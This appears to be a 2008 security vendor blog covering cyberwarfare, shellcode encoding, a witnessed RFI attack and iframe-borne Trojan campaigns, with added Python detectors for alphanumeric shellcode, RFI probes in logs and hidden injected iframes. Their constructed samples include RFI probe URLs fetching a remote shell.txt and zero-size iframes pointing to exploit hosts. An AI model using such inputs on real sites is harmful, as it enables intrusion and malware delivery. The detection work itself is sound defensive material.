8/13/2008 3:43:00 PM

A follow-up on the Russian-Georgian cyberwar

by Oren Medini

Further research on the recent cyberwarfare between Russia and Georgia reinforces the assumption in our last blog post regarding the identity of the party behind the attacks against Georgia. The research speculates that the series of cyber-attacks was carried out by the Russian government in parallel with conventional military operations. The article can be found at:
http://www.stratfor.com/analysis/georgia_russia_cyberwarfare_angle


Note: membership is required in order to view the above article.

Hackers

8/5/2008 3:59:00 PM

Alphanumeric Shellcode Encoding and Detection

by Avri Schneider

Recently I published, to the Full Disclosure mailing list, work regarding alphanumeric shellcode encoding and detection.

It discusses the methods attackers may use to evade intrusion detection systems, and generic possibilities for detecting them.

To view the original post, follow this link: http://lists.grok.org.uk/pipermail/full-disclosure/2008-August/063632.html

Attached to it are an alphanumeric shellcode encoder and a decoder routine that is very difficult to detect with existing intrusion detection systems; the post also discusses generic detection possibilities for this specific encoder and others, including proof-of-concept detection code.

Here's a demo of the same shellcode (a remote connect-back payload taken from Metasploit), encoded twice using the encoder.

Notice that the beginning of the shellcode (the decoder routine) is different on each execution.

http://www.aladdin.com/csrt/alnum_encoding_decoding.avi
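The demo above makes the detection problem concrete: the decoder routine changes on every execution, so a signature keyed on its bytes will not survive the next run. The script below is an added example written for this page (it is not the encoder, decoder or proof-of-concept detection code from the Full Disclosure post). Its two payload samples are constructed: a 24-byte binary header, a decoder-like prefix that differs between the samples, and one shared encoded body. A static signature on the first sample's prefix misses the second sample, while a signature-free scan for long alphanumeric runs inside otherwise binary data flags both. The 64-byte run threshold, the hex-token filter and the sample bytes are assumptions for the example.

```python
"""Signature-free triage for alphanumeric shellcode in captured payloads.
Added example for this page; the samples below are constructed, not real
encoder output, and the thresholds are starting points to tune per protocol."""
import math
import re
from dataclasses import dataclass

MIN_RUN = 64  # alnum runs shorter than this are ordinary tokens (words, IDs)


@dataclass
class Finding:
    offset: int
    length: int
    distinct: int   # distinct byte values in the run (triage information)
    entropy: float  # Shannon entropy, bits per byte (triage information)


def shannon_entropy(data: bytes) -> float:
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_benign_token(run: bytes) -> bool:
    # Hex digests and numeric IDs are long alphanumeric runs too; skip them
    # so that a checksum in an HTTP header does not trip the scan.
    return re.fullmatch(rb"[0-9A-Fa-f]+", run) is not None


def find_alnum_runs(payload: bytes, min_run: int = MIN_RUN) -> list:
    """Return every maximal run of [0-9A-Za-z] bytes of at least min_run bytes
    that is not a pure hex/numeric token. The scan does not depend on what
    the decoder stub looks like, only on the byte classes the payload may use."""
    pattern = re.compile(rb"[0-9A-Za-z]{%d,}" % min_run)
    findings = []
    for m in pattern.finditer(payload):
        run = m.group(0)
        if looks_like_benign_token(run):
            continue
        findings.append(Finding(m.start(), len(run), len(set(run)),
                                round(shannon_entropy(run), 2)))
    return findings


def signature_match(payload: bytes, decoder_signature: bytes) -> bool:
    """Naive static signature on a fixed decoder prefix, for comparison."""
    return decoder_signature in payload


# Constructed samples: binary header, a per-sample "decoder" prefix and a
# shared 120-byte alphanumeric body. Nothing here is real shellcode.
HEADER = bytes(range(0x00, 0x18))
BODY = b"Kc7Qm2Zp9Xr4Lw1Tv8Nb3Yh6Jd0Sf5" * 4
STUB_A = b"Vq3xPz8LmR2dYt7K"
STUB_B = b"Hn5cWb1gQe9sJu4F"
SAMPLE_A = HEADER + STUB_A + BODY + b"\r\n"
SAMPLE_B = HEADER + STUB_B + BODY + b"\r\n"
BENIGN = HEADER + b"sha256=" + b"9f" * 64 + b"\r\n"  # 128-char hex digest


def triage(payload: bytes) -> dict:
    """Compare the signature written for sample A with the generic scan."""
    return {"signature": signature_match(payload, STUB_A),
            "heuristic": bool(find_alnum_runs(payload))}


if __name__ == "__main__":
    for name, p in (("A", SAMPLE_A), ("B", SAMPLE_B), ("benign", BENIGN)):
        print(name, triage(p), find_alnum_runs(p))
```

The run scan is deliberately coarse: long alphanumeric values are common in cookies, session tokens and base64 fragments, so in practice it is a triage filter that hands candidates to a second stage (for example emulation of the candidate bytes), not a verdict on its own.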

Hackers | vulnerabilities

7/8/2008 6:40:00 PM

A witness to a real-time RFI attack

by Bahaa Naamneh

In this entry, I'm going to demonstrate an example of an RFI attack of which we witnessed all the stages. We came across this incident during a CSRT routine monitoring and inspection of the world of underground IRC networks.

Hackers take advantage of IRC to operate servers devoted to scanning the Web for websites vulnerable to RFI or SQL injection, and to trading credit card numbers and PayPal accounts. An RFI (Remote File Inclusion) attack is an intrusion into a website from a remote computer, carried out by making the vulnerable website run the hacker's own PHP code.

In a certain IRC channel, a bot that began scanning for websites vulnerable to RFI attacks caught our attention. The bot then found a number of websites ripe for an RFI attack.

To take over one of these vulnerable websites, the hackers used a PHP shell page that puts multiple functions under their control: browsing the files on the server hosting the website, executing commands, uploading files to the server, and other operations that facilitate taking control of the target website.

We were not surprised to see the victim website already defaced a few minutes later. Two days later, the website owners acknowledged in the following statement that their site had been hacked:

At present, it seems to us that the owners of the above website have regained control of their website and fixed the RFI vulnerability that the hackers exploited.
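The scanning bot described above leaves a recognisable trace in the victim's web server log: a request whose query-string parameter carries a full URL to the attacker's PHP code. The script below is an added example for this page (not CSRT's monitoring tooling) that parses Apache-style access log lines and flags such parameters. The log lines, IP addresses, paths and parameter names are constructed placeholders.

```python
"""Flag Remote File Inclusion probes in web server access logs.
Added example; the log lines below are constructed and follow the
Apache combined log layout (only the fields used here are parsed)."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_remote_include(value: str) -> bool:
    """True when a parameter value is an absolute URL or a scheme-relative
    //host path: the shapes an RFI scanner feeds to a vulnerable include().
    The extra unquote() also catches values that arrive double-encoded."""
    v = unquote(value).strip().lower()
    return v.startswith(REMOTE_SCHEMES) or v.startswith("//")


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line we cannot parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_findings(lines) -> list:
    """One finding per request parameter whose value points to a remote file."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_remote_include(value):
                findings.append({"ip": rec["ip"], "path": parts.path,
                                 "param": key, "value": value,
                                 "status": rec["status"]})
    return findings


def probing_sources(findings, threshold: int = 2) -> dict:
    """Source addresses with at least `threshold` RFI probes: likely scanners."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log: two RFI probes from one source, two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jul/2008:18:40:01 +0300] '
    '"GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [08/Jul/2008:18:40:02 +0300] '
    '"GET /modules/news.php?inc=https%3A%2F%2F198.51.100.9%2Fshell.txt HTTP/1.1" 404 210',
    '198.51.100.23 - - [08/Jul/2008:18:41:10 +0300] '
    '"GET /index.php?page=about HTTP/1.1" 200 2048',
    '198.51.100.23 - - [08/Jul/2008:18:41:11 +0300] '
    '"GET /search.php?q=http+basics HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    found = rfi_findings(SAMPLE_LOG)
    for f in found:
        print(f)
    print("scanners:", probing_sources(found))
```

A 200 status on such a request deserves the most attention, since it means the application served something rather than rejecting the include. On the mitigation side, PHP's allow_url_include directive (off by default in current releases) stops include() from fetching remote URLs at all, and the application should map the parameter to a fixed allow-list of local files rather than passing it to include() directly.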

Hackers

6/30/2008 5:17:00 PM

Hundreds of hacked websites recruited to serve a new variant of the Gozi Trojan

by Oren Medini

eSafe CSRT has recently discovered a new, massive Web attack in which a malicious iframe pointing to a remote exploit is planted on compromised legitimate websites. The iframe points to an MPack exploit kit, detected by eSafe as JS.Agent.hdd and hosted on a Chinese server. The exploit kit in turn downloads a new, improved version of the Russian Trojan horse known as Gozi, which eSafe detects as Win32.Agent.gjs.

The Gozi Trojan is designed to steal sensitive information and send it to a predefined address. We have noticed that this new version of Gozi transfers the stolen data to an IP address located in Malaysia.

The following TCP Stream shows the Gozi Trojan in action:

More than 600 legitimate websites have fallen victim to this attack. The list includes a popular pro-Israel website and a private banking service website located in the Cayman Islands. Visiting the bank's main page, or any of the other compromised websites, triggers the exploit and ends up downloading the Gozi Trojan onto the victim's system.

Hackers | Web-based Trojans

3/17/2008 4:36:00 PM

Trend Micro Falls Victim to Malicious Hack

by Oren Medini

According to numerous media sources, security firm Trend Micro has confirmed that a number of webpages on its Japanese and English-language websites were compromised by hackers on Sunday, March 9. This attack was part of a widespread web attack launched against websites across the world.

The attackers planted an invisible malicious IFrame tag in the compromised webpages in order to redirect users, using JavaScript, to a website located in China that served up malware.

Trend Micro discovered the problem on Wednesday, March 12, and replaced the affected pages with a message that reads: “This page is temporarily shut down for emergency maintenance”.

It has not yet been revealed how the webpages on Trend Micro's website were hacked; however, all of these webpages seem to use Microsoft's Active Server Pages (ASP) technology. The attackers probably exploited a vulnerability or a software bug in ASP to hack the webpages.

Trend Micro reported on its website that web surfers could be infected by the malware, which it named JS_DLOADER.TZE, either by accessing one of the infected webpages or by clicking a URL link embedded in the malware's name. It has recommended that visitors to its site check that their computers are not infected.
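Both this post and the Gozi post above describe the same injection: an invisible iframe added to legitimate pages, pointing at an exploit host elsewhere. A site owner can catch that pattern in their own HTML before a visitor does. The scanner below is an added example written for this page (it is not eSafe's detection code or anything from Trend Micro); it parses a page with Python's standard HTMLParser and reports iframes that are both off-site and hidden (zero or one pixel in size, or styled display:none / visibility:hidden). The sample page, hostnames and IP address are constructed placeholders.

```python
"""Report hidden off-site iframes injected into an HTML page.
Added example; the sample page below is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_tiny(value) -> bool:
    """Width/height of 0 or 1 (bare number or pixels) marks an invisible frame."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v.strip() in ("0", "1")


class IframeAuditor(HTMLParser):
    """Collect every <iframe> with the reasons it looks injected, if any."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlsplit(page_url).hostname or "").lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = urljoin(self.page_url, a.get("src", ""))   # resolves //host/path too
        host = (urlsplit(src).hostname or "").lower()
        reasons = []
        offsite = bool(host) and host != self.page_host
        if offsite:
            reasons.append("off-site src")
        if _is_tiny(a.get("width")) or _is_tiny(a.get("height")):
            reasons.append("zero-size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden style")
        hidden = "zero-size" in reasons or "hidden style" in reasons
        self.findings.append({
            "line": self.getpos()[0],
            "src": src,
            "reasons": reasons,
            # An embedded video is off-site but visible; a same-site frame may be
            # hidden for layout reasons. Only the combination is flagged.
            "suspicious": offsite and hidden,
        })


def audit_html(html: str, page_url: str) -> list:
    """Return one record per iframe found in `html`, served from `page_url`."""
    parser = IframeAuditor(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


def suspicious_iframes(html: str, page_url: str) -> list:
    return [f for f in audit_html(html, page_url) if f["suspicious"]]


# Constructed page: two legitimate frames and two injected ones (lines 6 and 7).
PAGE_URL = "https://www.bank.example/"
SAMPLE_PAGE = """<html><head><title>Bank home</title></head>
<body>
<iframe src="https://www.bank.example/rates" width="600" height="300"></iframe>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
<p>Welcome to our online banking service.</p>
<iframe src="http://exploit.invalid/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<iframe src="//203.0.113.10/mp/index.php" width=1 height=1></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in suspicious_iframes(SAMPLE_PAGE, PAGE_URL):
        print(f"line {f['line']}: {f['src']} ({', '.join(f['reasons'])})")
```

This is a static check of the served HTML, so it is worth running from outside the site (fetching pages the way a visitor would, since the injection lives in the delivered content, not necessarily in the source tree). Where the injected tag is built at runtime by obfuscated JavaScript, as this post describes, the static parse will not see the iframe, and the page's script tags need the same off-site scrutiny.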

Hackers